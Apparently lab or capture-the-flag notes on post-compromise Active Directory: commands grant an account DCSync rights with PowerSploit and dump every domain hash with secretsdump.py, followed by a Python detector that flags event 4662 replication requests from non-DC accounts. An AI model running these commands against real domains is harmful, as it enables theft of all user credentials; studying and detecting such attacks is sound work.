After Getting D.C.

Once you control the Domain Controller, you can dump all user hashes, which is proof that the whole domain is yours.

  windows: Import-Module .\PowerSploit.ps1

  windows: Add-DomainObjectAcl -PrincipalIdentity DC_username -TargetIdentity "DC=htb,DC=local" -Rights DCSync

  linux: secretsdump.py "htb.local/DC_username:password@$IP"
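
On the defending side, the replication request made in the last step shows up as Security event 4662 carrying the replication control-access-right GUIDs under an account that is not a domain controller. The following is an added example, not part of the original notes: the event records are constructed and simplified, and the function name and the DC allow-list (DC01$) are assumptions.

```python
import re

# Control-access-right GUIDs that permit directory replication (DCSync).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def find_dcsync_suspects(events, known_dc_accounts):
    """Return (account, sorted right names) for each 4662 event in which
    an account outside the DC allow-list exercised a replication right."""
    allowed = {a.lower() for a in known_dc_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        account = ev.get("SubjectUserName", "")
        if account.lower() in allowed:
            continue  # expected DC-to-DC replication
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        if rights:
            hits.append((account, rights))
    return hits


# Constructed sample records; field names follow Windows Security event 4662.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "DC_username",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4624, "SubjectUserName": "DC_username", "Properties": ""},
    {"EventID": 4662, "SubjectUserName": "svc_backup",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for account, rights in find_dcsync_suspects(SAMPLE_EVENTS, ["DC01$"]):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Event 4662 is only written when Directory Service Access auditing is enabled and the domain object carries a matching audit entry.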
